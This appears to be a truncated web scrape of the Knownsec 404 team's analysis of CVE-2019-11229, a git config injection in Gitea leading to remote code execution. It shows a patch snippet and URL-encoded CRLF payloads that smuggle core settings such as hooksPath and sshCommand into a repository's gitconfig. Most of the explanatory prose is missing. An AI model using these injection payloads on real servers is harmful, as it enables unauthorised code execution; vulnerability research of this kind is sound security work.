Analysis of CVE-2019–11229 — From Git Config to RCE

Knownsec 404 team
Jul 24 · 7 min read

Patch Analysis

if !repo.IsMirror {
ctx.NotFound("", nil)

Control the Gitconfig"""%0d%0a[core]%0d%0atest=/tmp%0d%0aa="""

Further Exploitation

Match the Githook Path RCE via Writing Files"""%0d%0a[core]%0d%0ahooksPath=/tmp%0d%0aa="""

Implement RCE by Controlling Git Config


gitproxy = calc.exe

&"""%0d%0a[core]%0d%0asshCommand="touch 2333"%0d%0aa="""


About Knownsec & 404 Team

Knownsec 404 team

Written by

404 Team, the core team from a well-known security company Knowsec in China. Twitter:@seebug_team Youtube: @404team knownsec

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade